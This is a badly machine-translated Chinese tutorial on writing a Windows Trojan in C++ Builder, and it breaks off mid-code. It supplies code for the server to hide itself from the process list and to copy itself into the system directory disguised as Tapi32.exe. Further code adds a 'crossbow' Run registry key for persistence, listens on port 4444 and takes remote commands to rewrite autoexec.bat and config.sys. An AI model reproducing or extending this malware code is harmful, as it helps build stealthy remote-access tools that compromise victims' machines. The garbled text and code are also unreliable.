On how the Trojan is written: Zhou Kan / Chinese software, as reproduced please ensure the integrity of this document, and to indicate the source. Welcome to C Builder Research, http://www.ccrun.com/doc/go.asp? Id = 163 Trumi 依 木 马 名 大 大 大 大 不, 黑 黑 黑 黑 黑 黑 黑 黑 黑 黑 黑, The Trojans are like a flat thunder, making China netizens growing up in the DOS - Windows era, awakened from the dream of colorful networks, and finally recognized the network also has its evil side, one time people. I saw an article at the "Computer Daily", mostly a rookie was controlled by the BO, scared all day, I can't eat, I can't sleep, I can't help it! Oh, you have to know that Trojan's history is a long time: As early as AT & T UNIX and BSD UNIX, Trojan is a very high-level young man (mainly old). ) Written in C or Shell language, basically used to steal the password of the landing host to achieve higher permissions. At that time, the main method of Trojans was to trick - first modify your .profile file, implant the Trojan; when you log in, save your password characters into a file, and send it to the attacker's mailbox. Domestic young people are growing up in pirated DOS, which can be said to be very strange to the network. Until Win9x is born, especially the popularity of WinNT, the development of the network cause, BO This is a bit simple and even saying that it is a simple Trojan (even in Win9x "closing procedure. The dialog can see the process) gave the Chinese people very shocking, and it can be said to be an epoch-making software in China's network security. Write the Trojan yourself, is it COOL? ! Trojans must be composed of two parts-server program (Server) and client programs (client), the server is responsible for opening an attack, just like a rape special; client is responsible for attacking the target, both require a certain network protocol to do Communication (typically TCP / IP protocol). In order to make everyone better understand the mystery of Tumao, break away the mystery of Trojans, I will talk about the technology of writing Trojans and write an example Trojan, making everyone better guarding and killing various known and known. Unknown Trojan. The first is the selection of programming tools. At present, the popular development tools have C Builder, VC, VB and Delphi. Here we use C Builder (hereinafter referred to as BCB); VC is good, but the GUI design is too complicated, in order to better highlight my example, concentrate Attention to the basic principles of Trojans, we use visualized BCB; Delphi is also good, but the defect cannot inherit the existing resources (such as "Death Bull Worship" hacker group published BO2000 source code, is written online, online I will pick up it); VB, I don't talk about it - do you also pass the victim a more than 1 trigulent dynamic link library - MSVBVM60.DLL? Start C Builder 5.0 Enterprise Edition, create a new project, add three VCL controls: one is the Server Socket in the Internet page, and the other is NMFTP and NMSMTP in the FastNet page.
The function of Server Socket is used to make this program into a server program, which can be served (open the attacker). Socket was originally appeared on UNIX. Later, Microsoft introduced it into Windows (including Win98 and WINNT); the role of the two controls is to make the program with FTP (File Transfer Protocol File Transfer Protocol) and SMTP (Simple Mail) TRANSFER Protocol Simple Mail Transfer Protocol The function, you know that you know that the software has controls for uploading downloads and email features. The Form form is visible, which is of course incredible. Not light, there is a lot of space (there is 300K a Form), and the software is visible, there is no role. So actually writing Trojans, you can use some techniques to make the program do not include FORM, just like the apparatus implemented by the Delphi process is only about 17k. We should first let our procedures can be stealth. Double-click Form, first add the code that hides the Trojate in the Win9x "Close Program" dialog box in the FormCreate event. This looks mysterious. In fact, it is just a background process called Service, which can be run under a higher priority, which can be said to be the one in the device driver that is very close to the system. Therefore, as long as our program is registered into a service process in the process database (), the service process is available. However, this function is not in the header file of Borland's pre-packaged header, then we have to declare this bird function in kernel32.dll. First determined the operating system of the target machine is Win9X or Winnt: {dword dWversion = getversion (); // Get the version number of the operating system (dWversion> = 0x80000000) // Operating system is Win9X, not winnt {typedef dword (callback * lPREGISTERSERVICEPROCESS) (DWORD, DWORD); file: // set / sense RegisterServiceProcess () function prototype HINSTANCE hDLL; lPREGISTERSERVICEPROCESS lpRegisterServiceProcess; = LoadLibrary hDLL ( "KERNEL32"); file: // add / carrier RegisterServiceProcess dynamic function where () link library KERNEL32.DLLlpRegisterServiceProcess = (lPREGISTERSERVICEPROCESS) GetProcAddress (hDLL, "RegisterServiceProcess"); file: // get / to RegisterServiceProcess () function address lpRegisterServiceProcess (GetCurrentProcessId (), 1); file: // Executive / line RegisterServiceProcess () Function, hidden this process FreeElibrary (HDLL); file: // Unloading / carrier link library}} This will finally stealth (harm me knocking so much code!). Why judge the operating system? Because the process manager in WinNT can be unbelful to the current process, there is no need to use the above code under WinNT (but you can use other methods, this is left later).
Then copy yourself to the% system% directory, such as: c: / windows / system, and modify the registry to automatically load when starting: {char Temppath [max_path]; file: // Type / Yi one variable GetSystemDirectory; file: // Temppath / is the address of the System directory buffer, MAX_PATH is the size of the buffer, get the SYSTEM directory path of the target machine SystemPath = Ansistring (Temppath); file: // Form / style Temppath string makes it a style CopyFile that can be used by the compiler (paramstr (0) .c_str (), ANSISTRING (SystemPath "// Tapi32.exe"). C_str (), false; file: // Copy themselves to the% system% directory and renamed Tapi32.exe, camouflage registry = new Tregistry; file: // Type / righteously a Tregistry object, ready to modify the registry, this step is essential-> rootkey = HKEY_LOCAL_MACHINE File: // set / set the master key to hkey_local_machineregistry-> OpenKey ("Software // Microsoft // Windows // CurrentVersion // Run"; file: // Type / Key value Software // Microsoft // Windows // currentversion // Run, if there is no existence, create the try {file: // If the following statement occurs, jump to catch to avoid the program crash if (Registry-> ReadString ("crossbow")! = SystemPath "//Tapi32.exe")Registry,", "crossbow" ,stempath "/tapi32.exe" );file:// Check / find the key value of" crossbow ", and whether it is a copy of the directory % System% TAPI32.EXEFILE: / / If / fruit is not, write the above key value and content} catch (...) {file: // If there is an error, nothing}} is good, the formcreate process is completed In this way, Tapi32.exe can be loaded each time, and I can't see this process in the Closed Program dialog box, the timeline of the Trojan. Then select the Serversocket control, change the Active to TRUE in the Object Inspector on the left, so that the program opens a specific port to operate in the server. The port is filled in 4444, which is the port number of the Trojan, of course, you can use other. But you have to pay attention not to use a low-end port of 1024 below, because this may not only conflict with the ports used by the basic network protocol, but it is easy to find, so try to use a high-end port of 1024 or more (but there is also a technology. It deliberately uses specific ports, because if conflicts cause, Windows will not report an error ^ _ ^). You can take a look at the port used by the TNMFTP control, which is a port of the FTP protocol (FTP Control Port); the secondary port of TNMSMTP is also a dedicated port of the SMTP protocol.
Select the Serversocket control, click on the Events page, double-click the onclientread event, knock into the following code: {file * fp = null; char * content; int Times_of_Try; char Tempfile [max_path]; file: // 义 义 a bunch The variable to be used in Sprintf (TempFile, "% S", ANSISTRING ("//win369.bat")) .c_str ()); file: // Under% system% / create a text file Win369.bat, using ansistring temp = socket-> receiveText (); file: // pick / receive the client (attacker, it is your own) data} is open! Then it is to modify the various configurations of the target machine! ^ _ ^ First let us modify autoexec.bat and config.sys: {if (Temp.substring (0,9) == "Edit conf") file: //, such as //, the top 9 of the string accepted The characters are "edit conf" {int number = Temp.Length (); file: // Get / to the length INT file_name = atoi ((Temp.Substring (11, 1)). C_str ()); File: // Translate / 11 characters into an Integer type, save the file_name variable file: / / for / what is the 11th character, because the 10 characters are space characters content = (Temp.substring (12, Number- 11) '/ n') .c_str (); File: // 余 / The string will be written as the write target file file * fp = null; char filename [20]; chmod ("c : //autoexec.bat ", s_iread | s_iwrite); chmod (" c: //config.sys ", s_iread | s_iwrite); file: // change / two target files to readable write IF ( FILE_NAME == 1) Sprintf (filename, "% s", "c: //autoexec.bat"); file: // If the 11th character is 1, put autoexec.bat format Else if (file_name == 2) Sprintf (filename, "% s", "c: ///config.sys"); file: // If the 11 characters are 1, put config.sys format Times_OF_TRY = 0; File : // / 定 计 计 (fp == null) {file: // If the pointer is empty FP = FOPEN (FileName, "A "); file: // If the file does not exist, create; If present, prepare to add file: //, if // is wrong, the file pointer is empty, so you will repeat the times_of_try = TIMES_OF_TRY 1; file: // / / 加 1IF (TIMES_OF_TRY> 100) {FILE: // If the fruit has already tried 100 times, there is still no SOCKET-> Sendtext ("Fail by Open File"); file: // Send back the "fail by open file" error message goto end;
